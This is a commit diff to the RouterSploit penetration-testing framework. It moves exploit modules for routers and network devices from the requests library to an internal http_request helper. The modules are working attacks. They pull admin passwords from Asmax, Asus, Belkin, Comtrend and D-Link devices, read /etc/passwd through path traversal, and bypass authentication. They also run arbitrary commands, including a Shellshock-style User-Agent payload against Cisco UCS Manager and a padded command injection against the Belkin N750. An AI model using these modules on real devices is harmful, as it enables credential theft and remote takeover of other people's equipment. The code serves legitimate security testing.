Switching exploits modules from requests to http_request.

f2612a17 · Marcin Bury · fe644aa9 · f2612a17 · f2612a17 · f2612a17
Commit f2612a17 authored Apr 21, 2016 by Marcin Bury
25 changed files
--- a/routersploit/modules/exploits/2wire/gateway_auth_bypass.py
+++ b/routersploit/modules/exploits/2wire/gateway_auth_bypass.py
-import requests
 from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
            '2Wire 2701HGV-W',
            '2Wire 3800HGV-B',
            '2Wire 3801HGV',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
@@ -41,28 +41,28 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Target seems to be not vulnerable")
+    @mute
    def check(self):
-        # check if it is valid target
+        mark = '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">'
+        # checking if the target is valid
        url = sanitize_url("{}:{}/".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None
-        if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
+        if mark not in response.text:
-            return False
+            return False  # target is not vulnerable
        # checking if authentication can be baypassed
        url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
-        try:
-            r = requests.get(url, verify=False)
-            res = r.text
-        except:
-            return None
-        if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+        if mark not in response.text:
            return True  # target vulnerable
        return False  # target not vulnerable
--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
@@ -29,7 +29,7 @@ class Exploit(exploits.Exploit):
        ],
        'targets': [
             'Asmax AR 1004g',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
@@ -40,20 +40,20 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
        print_status("Requesting for {}".format(url))
-        try:
-            response = http_request(method="GET", url=url).text
+        response = http_request(method="GET", url=url)
-        except AttributeError:
+        if response is None:
            return
-        admin = re.findall("pwdAdmin = '(.+?)'", response)
+        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if admin:
            creds.append(('Admin', admin[0]))
-        support = re.findall("pwdSupport = '(.+?)'", response)
+        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if support:
            creds.append(('Support', support[0]))
-        user = re.findall("pwdUser = '(.+?)'", response)
+        user = re.findall("pwdUser = '(.+?)'", response.text)
        if user:
            creds.append(('User', user[0]))
@@ -67,12 +67,11 @@ class Exploit(exploits.Exploit):
    def check(self):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            response = http_request(method="GET", url=url).text
+        if response is None:
-        except AttributeError:
+            return False  # target is not vulnerable
-            return None  # could not be verified
-        if any(map(lambda x: x in response, ["pwdSupport", "pwdUser", "pwdAdmin"])):
+        if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
            return True  # target vulnerable
        return False  # target not vulnerable
--- a/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
+++ b/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')
    def run(self):
-        if self.check() is True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -50,12 +50,11 @@ class Exploit(exploits.Exploit):
    def execute(self, cmd):
        url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
-        try:
+        response = http_request(method="GET", url=url)
-            response = http_request(method="GET", url=url, verify=False).text
+        if response is None:
-        except AttributeError:
            return ""
-        return response
+        return response.text
    @mute
    def check(self):

--- a/routersploit/modules/exploits/asus/rt_n16_password_disclosure.py
+++ b/routersploit/modules/exploits/asus/rt_n16_password_disclosure.py
-import requests
 import re
 from routersploit import (
@@ -7,13 +6,15 @@ from routersploit import (
    print_error,
    print_success,
    print_table,
+    http_request,
+    mute,
 )
 class Exploit(exploits.Exploit):
    """
    Exploit implementation for Asus RT-N16 Password Disclosure vulnerability.
-    If the target is vulnerable it allows to read credentials for administrator."
+    If the target is vulnerable it allows to read credentials for administrator.
    """
    __info__ = {
        'name': 'Asus RT-N16 Password Disclosure',
@@ -32,8 +33,7 @@ class Exploit(exploits.Exploit):
            'ASUS RT-AC66U, firmware 3.0.0.4.374_2050',
            'ASUS RT-N15U, firmware 3.0.0.4.374_16',
            'ASUS RT-N53, firmware 3.0.0.4.374_311',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
@@ -42,17 +42,11 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
-        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
+        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)
        if len(creds):
            c = [("admin", creds[0])]
@@ -62,17 +56,17 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Credentials could not be found")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not be verified
+        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)
-        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
        if len(creds):
-            return True  # target vulnerable
+            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
+++ b/routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
-import requests
 import re
 from routersploit import (
@@ -7,6 +6,8 @@ from routersploit import (
    print_error,
    print_success,
    print_table,
+    http_request,
+    mute,
 )
@@ -30,7 +31,7 @@ class Exploit(exploits.Exploit):
        'targets': [
            'Belkin G',
            'Belkin N150',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -39,14 +40,11 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
-        val = re.findall('password = "(.+?)"', res)
+        val = re.findall('password = "(.+?)"', response.text)
        if len(val):
            print_success("Exploit success")
@@ -57,16 +55,15 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not verify
-        val = re.findall('password = "(.+?)"', res)
+        val = re.findall('password = "(.+?)"', response.text)
        if len(val):
            return True  # target vulnerable

--- a/routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
+++ b/routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
-import requests
 import re
 from routersploit import (
@@ -7,6 +6,8 @@ from routersploit import (
    print_error,
    print_success,
    print_table,
+    http_request,
+    mute,
 )
@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
        ],
        'targets': [
            'Belkin G',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -37,11 +38,8 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
        var = ['pppoe_username',
@@ -58,7 +56,7 @@ class Exploit(exploits.Exploit):
        for v in var:
            regexp = '{}="(.+?)"'.format(v)
-            val = re.findall(regexp, res)
+            val = re.findall(regexp, response.text)
            if len(val):
                data.append((v, val[0]))
@@ -70,14 +68,13 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Exploit failed")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not verify
        var = ['pppoe_username',
                'pppoe_password',
@@ -89,7 +86,7 @@ class Exploit(exploits.Exploit):
                'http_passwd',
                'pppoe_passwd']
-        if any(map(lambda x: x in res, var)):
+        if any(map(lambda x: x in response.text, var)):
            return True   # target vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/belkin/n150_path_traversal.py
+++ b/routersploit/modules/exploits/belkin/n150_path_traversal.py
-import requests
 from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -30,7 +30,7 @@ class Exploit(exploits.Exploit):
            'Belkin N150 1.00.07',
            'Belkin N150 1.00.08',
            'Belkin N150 1.00.09',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -40,29 +40,25 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.target, self.port, self.filename))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
-        if len(res):
+        if len(response.text):
            print_success("Success! File: %s" % self.filename)
-            print res
+            print response.text
        else:
            print_error("Exploit failed")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not verify
-        if "root:" in res:
+        if "root:" in response.text:
            return True  # target vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/belkin/n750_rce.py
+++ b/routersploit/modules/exploits/belkin/n750_rce.py
-import requests
 from routersploit import (
    exploits,
    print_success,
    print_status,
    print_error,
+    random_text,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -52,29 +53,20 @@ class Exploit(exploits.Exploit):
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
        data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
-        try:
+        response = http_request(method="POST", url=url, headers=headers, data=data)
-            r = requests.post(url, headers=headers, data=data, verify=False)
+        if response is None:
-            res = r.text
+            return ""
-        except requests.exceptions.MissingSchema:
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
-        return res
+        return response.text
+    @mute
    def check(self):
-        # todo random mark
+        mark = random_text(32)
-        url = sanitize_url("{}:{}/login.cgi".format(self.target, self.port))
+        cmd = "echo {}".format(mark)
-        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = "GO=&jump=" + "A" * 1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
-        try:
+        response = self.execute(cmd)
-            r = requests.post(url, headers=headers, data=data, verify=False)
-            res = r.text
-        except:
-            return None  # could not verify
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response:
            return True  # target vulnerable
        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/cisco/ucs_manager_rce.py
+++ b/routersploit/modules/exploits/cisco/ucs_manager_rce.py
-import requests
 import re
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    random_text,
+    sanitize_url,
+    http_request,
+    mute,
+)
 class Exploit(exploits.Exploit):
@@ -22,14 +30,14 @@ class Exploit(exploits.Exploit):
        ],
        'targets': [
            'Cisco UCS Manager 2.1 (1b)',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
    port = exploits.Option(80, 'Target Port')
    def run(self):
-        if self.check() == True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -42,40 +50,33 @@ class Exploit(exploits.Exploit):
            print self.execute(cmd)
    def execute(self, cmd):
+        mark = random_text(32)
        url = sanitize_url("{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port))
        headers = {
-            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo ffffffffffffffff; echo "$(%s)"; echo ffffffffffffffff;' % cmd
+            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
        }
-        try:
+        response = http_request(method="GET", url=url, headers=headers)
-            r = requests.get(url, headers=headers, verify=False)
+        if response is None:
-            res = r.text
+            return ""
-        except requests.exceptions.MissingSchema:
-            return "Invalid URL format: %s" % url
+        if mark in response.text:
-        except requests.exceptions.ConnectionError:
+            regexp = "%s(|.+?)%s" % (mark, mark)
-            return "Connection error: %s" % url
+            res = re.findall(regexp, response.text, re.DOTALL)
-        if 'ffffffffffffffff' in res:
-            res = re.findall("ffffffffffffffff(|.+?)ffffffffffffffff", res, re.DOTALL)
            if len(res):
                return res[0]
-        return False
+        return ""
+    @mute
    def check(self):
-        # meaby random mark should be implemented
+        mark = random_text(32)
-        url = sanitize_url("{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port))
+        cmd = "echo {}".format(mark)
-        headers = {
-            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo 9fdbd928b52c1ef61615a6fd2e8b49af;'
-        }
-        try:
+        response = self.execute(cmd)
-            r = requests.get(url, headers=headers, verify=False)
-            res = r.text
-        except:
-            return None
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response:
            return True
        return False

--- a/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
+++ b/routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
 from base64 import b64decode
 import re
-import requests
 from routersploit import (
    exploits,
-    sanitize_url,
    print_status,
    print_error,
    print_success,
    print_table,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -21,7 +22,7 @@ class Exploit(exploits.Exploit):
        'name': 'Comtrend CT 5361T Password Disclosure',
        'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
        'authors': [
-            'TUNISIAN CYBER',  # routersploit module,
+            'TUNISIAN CYBER',  # routersploit module
         ],
        'references': [
            'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
@@ -40,26 +41,21 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
        print_status("Requesting for {}".format(url))
-        try:
-            r = requests.get(url)
+        response = http_request(method="GET", url=url)
-            res = r.text
+        if response is None:
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
        creds = []
-        admin = re.findall("pwdAdmin = '(.+?)'", res)
+        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if len(admin):
            creds.append(('Admin', b64decode(admin[0])))
-        support = re.findall("pwdSupport = '(.+?)'", res)
+        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if len(support):
            creds.append(('Support', b64decode(support[0])))
-        user = re.findall("pwdUser = '(.+?)'", res)
+        user = re.findall("pwdUser = '(.+?)'", response.text)
        if len(user):
            creds.append(('User', b64decode(user[0])))
@@ -71,16 +67,15 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Credentials could not be found")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not be verified
-        if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
+        if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
            return True  # target vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
+++ b/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
-import requests
 from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -44,27 +44,26 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Target seems to be not vulnerable")
+    @mute
    def check(self):
        # check if it is valid target
        url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
-        try:
-            r = requests.get(url)
-            res = r.text
-        except:
-            return None  # could not be verified
-        if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
+        response = http_request(method="GET", url=url)
-            return False
+        if response is None:
+            return False  # target is not vulnerable
+        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
+            return False  # target is not vulnerable
        # checking if authentication can be baypassed
        url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
-        try:
-            r = requests.get(url)
-            res = r.text
-        except:
-            return None  # could not be verified
-        if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
+        response = http_request(method="GET", url=url)
-            return True  # target vulnerable
+        if response is None:
+            return False  # target is not vulnerable
+        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
+            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
-import requests
 import re
 from routersploit import (
    exploits,
-    sanitize_url,
    print_error,
    print_success,
    print_table,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -29,7 +30,7 @@ class Exploit(exploits.Exploit):
            'D-Link DIR-300 (all)',
            'D-Link DIR-600 (all)',
            'D-Link DIR-615 (fw 4.0)',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
@@ -38,17 +39,11 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
-        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
+        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text)
        if len(creds):
            c = creds[0].split(":")
            creds = [(c[0], c[1])]
@@ -58,17 +53,16 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Credentials could not be found")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not be verified
-        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
+        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text)
        if len(creds):
-            return True  # target vulnerable
+            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dir_300_600_rce.py
+++ b/routersploit/modules/exploits/dlink/dir_300_600_rce.py
-import requests
 from routersploit import (
    exploits,
-    sanitize_url,
    print_error,
    print_success,
    print_status,
+    random_text,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')
    def run(self):
-        if self.check() is True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -53,28 +54,20 @@ class Exploit(exploits.Exploit):
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
        data = "cmd={}".format(cmd)
-        try:
+        response = http_request(method="POST", url=url, headers=headers, data=data)
-            r = requests.post(url, headers=headers, data=data)
+        if response is None:
-        except requests.exceptions.MissingSchema:
+            return ""
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
-        return r.text.strip()
+        return response.text.strip()
+    @mute
    def check(self):
-        # meaby random mark should be implemented
+        mark = random_text(32)
-        url = sanitize_url("{}:{}/command.php".format(self.target, self.port))
+        cmd = "echo {}".format(mark)
-        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = "cmd={}".format("echo 9fdbd928b52c1ef61615a6fd2e8b49af;")
-        try:
+        response = self.execute(cmd)
-            r = requests.post(url, headers=headers, data=data)
-            res = r.text
-        except:
-            return None
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response:
-            return True
+            return True  # target is vulnerable
-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dir_645_password_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dir_645_password_disclosure.py
-import requests
 import re
 from routersploit import (
    exploits,
-    sanitize_url,
    print_error,
    print_success,
    print_table,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -39,47 +40,38 @@ class Exploit(exploits.Exploit):
        data = {"SERVICES": "DEVICE.ACCOUNT"}
        # connection
-        try:
+        response = http_request(method="POST", url=url, data=data)
-            r = requests.post(url, data=data)
+        if response is None:
-            res = r.text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
        # extracting credentials
        regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
-        creds = re.findall(regular, re.sub('\s+', '', res))
+        creds = re.findall(regular, re.sub('\s+', '', response.text))
        # displaying results
        if len(creds):
            print_success("Credentials found!")
            headers = ('Username', 'Password')
            creds = tuple(tuple([item[0], item[2]]) for item in creds)
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
+    @mute
    def check(self):
        # address and parameters
        url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
        data = {"SERVICES": "DEVICE.ACCOUNT"}
-        # connection
+        response = http_request(method="POST", url=url, data=data)
-        try:
+        if response is None:
-            r = requests.post(url, data=data)
+            return False  # target is not vulnerable
-            res = r.text
-        except:
-            return None
        # extracting credentials
        regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
-        creds = re.findall(regular, re.sub('\s+', '', res))
+        creds = re.findall(regular, re.sub('\s+', '', response.text))
        if len(creds):
-            return True  # target vulnerable
+            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
+++ b/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
-import requests
 import re
 from routersploit import (
@@ -6,7 +5,10 @@ from routersploit import (
    print_success,
    print_status,
    print_error,
+    random_text,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -35,7 +37,7 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')
    def run(self):
-        if self.check() is True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -48,33 +50,33 @@ class Exploit(exploits.Exploit):
            print self.execute(cmd)
    def execute(self, cmd):
-        url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
+        mark = random_text(32)
+        url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return ""
-        except:
-            return False
-        if 'ffffffffffffffff' in res:
+        if mark in response.text:
-            res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)
+            regexp = "(|.+?){}".format(mark)
+            res = re.findall(regexp, response.text, re.DOTALL)
            if len(res):
                return res[0]
-        return False
+        return ""
+    @mute
    def check(self):
-        # meaby random mark should be implemented
+        mark = random_text(32)
-        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
+        cmd = "echo {}".format(mark)
        url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-        except:
+            return False  # target is not vulnerable
-            return None
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:
+        if mark in response.text:
-            return True
+            return True  # target is vulnerable
-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py
-import requests
 import re
 from routersploit import (
    exploits,
    print_success,
    print_error,
-    sanitize_url,
    print_table,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -29,7 +30,7 @@ class Exploit(exploits.Exploit):
        ],
        'targets': [
            'D-Link DSL-2750B EU_1.01',
-        ]
+        ],
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
@@ -38,14 +39,8 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
        creds = []
@@ -53,30 +48,27 @@ class Exploit(exploits.Exploit):
        for d in data:
            regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(d)
-            val = re.findall(regexp, res)
+            val = re.findall(regexp, response.text)
            if len(val):
                creds.append((d, val[0]))
        if len(creds):
            print_success("Credentials found!")
            headers = ("Option", "Value")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None
-        if any(map(lambda x: x in res, ["SSID", "PassPhrase"])):
+        if any(map(lambda x: x in response.text, ["SSID", "PassPhrase"])):
-            return True   # target vulnerable
+            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
+++ b/routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
-import requests
 from routersploit import (
    exploits,
-    sanitize_url,
    print_success,
    print_error,
    print_status,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -40,35 +40,29 @@ class Exploit(exploits.Exploit):
        data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
        # connection
-        try:
+        response = http_request(method="POST", url=url, data=data)
-            r = requests.post(url, data=data)
+        if response is None:
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
-        if r.status_code == 200:
+        if response.status_code == 200:
            print_success("Exploit success")
            print_status("File: {}".format(self.filename))
-            print r.text
+            print response.text
        else:
            print_error("Exploit failed")
+    @mute
    def check(self):
        # address and parameters
        url = sanitize_url("{}:{}/cgi-bin/webproc".format(self.target, self.port))
